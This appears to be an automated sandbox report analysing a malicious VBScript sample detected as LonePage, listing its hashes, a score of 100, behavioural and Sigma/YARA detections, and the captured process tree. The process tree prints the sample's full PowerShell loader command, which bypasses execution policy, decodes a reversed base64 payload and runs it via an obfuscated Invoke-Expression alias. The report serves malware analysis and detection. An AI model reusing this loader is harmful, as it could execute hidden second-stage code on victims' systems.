Edit tour
Windows
Analysis Report
F1ATty1iXD.vbs
Overview
General Information
Sample name: | F1ATty1iXD.vbsrenamed because original name is a hash value |
Original sample name: | 9d23030c00880fceedd70205814ea169e627d96de2f1146cf48f1cb2c2512dc8.vbs |
Analysis ID: | 1542809 |
MD5: | 260a265d96232f106d0b16eaf8995b77 |
SHA1: | 2dfd3dd589d0f7d4f592014d9ec562f557192e4b |
SHA256: | 9d23030c00880fceedd70205814ea169e627d96de2f1146cf48f1cb2c2512dc8 |
Tags: | blogview-shopvbsuser-JAMESWT_MHT |
Infos: | |
Detection
LonePage
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
VBScript performs obfuscated calls to suspicious functions
Yara detected LonePage
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- wscript.exe (PID: 7604 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\F1ATt y1iXD.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7696 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -execution policy byp ass -w hid den -nopro file -c $b est64code = '==Qf7kS ewJHZkwyJz g2clJnZlJ3 LzVWdsFmdv kGch9Ccvh2 cucXZpZ3Zv xmYv8iOzBH d0h2JoEGdh RGZh9GbwVn LrpWdksjNx ACclVGbz1C dyFGdztDdu VWasNmYldn L0VmbgQ3Yl pmYv1ydl5W PrpWdksDMx ACclVGbz1C dyFGdztTf7 kybkpmYkgy clRXeCRXZH 5COmRXV6oT Xn5Wak92Yu VmL0hXZ05S blR3c5N3W9 kHcyRGJd11 WlRXeit1On 5WayR3ctQX dPxnbihGJ9 sybkpmYksj crpGJggVRJ 1jbihGJ7Um bpx0dl5kO6 0FduVWbu9m cpZnbF5Sbl R3c5N1WrkC cpRCKzV2cz VmckRWQ0N3 bIRXZHpjOd NnbE5Cdl5k LtVGdzl3Ub 1zKvRmaiRy On0TPn0zKv RmaiRyOp1W Yvh2d98GZq JGJ7V2csVW f7I3aqRCIY VUS9kHcyRG Jg0VXbVGd5 J2W7lyJ05W Z052bj1Cdl d2Jgg2Y0FW btAicrpGJo YWa7kSbsZG JocmbpJHdT RXZn5COmRX d6oTXn5Wak 92YuVmL0hX Z05SblR3c5 N3W9I3aqRy epEDI0dWLg gGdn5WZM5S bsZGJoYWa7 kyYyRyKn8y MoNXZyZWZy 9iNzMjNwkj M3QzN3cDM5 MDO5UjN18y clVHbhZ3Lp BXYvA3boNn L3VWa2d2bs J2LvozcwRH dodCKhRXYk RWYvxmb39G ZusWapRSPt xmZkszJ0hH ducCIrASK9 9FJdJXYoN2 WgsHI0NWZq J2btg2YhVm cvZGI8BSK1 EDI4FWbtAS Ng4Wat1CIt 9GZuFmctQX ZnBCK05Wdv NWLg02bk5W Yy1CdldGI8 BSK3UjLugD NogCIul2bq 1CI9AyYyRy O05WZpx2Yi V2duQXZuBC djVmai9WL3 Vmb9sWapRy OxEDIwVWZs NXL0JXY0N3 OpMDNggXYt 1CI1Aibp1W Lg02bk5WYy 1CdldGKgAX Zlx2ctQnch R3c7kzMgAX Zlx2ctQnch R3c' ;$bas e64 = $bes t64code.To CharArray( ) ; [array ]::Reverse ($base64) ; -join $b ase64 2>&1 > $null ;$ lOadcODE = [sYSTEm.t ext.eNCoDI ng]::UtF8. geTstRiNG( [SYStEM.co NvErT]::FR oMBAse64st RInG($BASe 64)) ;$pwn = 'InV'+' Oke'+'-ex' +'Pre'+'Ss I'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pW N -forCe ; pWn $LoaD Code ; MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7704 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_LonePage | Yara detected LonePage | Joe Security | ||
JoeSecurity_LonePage | Yara detected LonePage | Joe Security | ||
JoeSecurity_LonePage | Yara detected LonePage | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |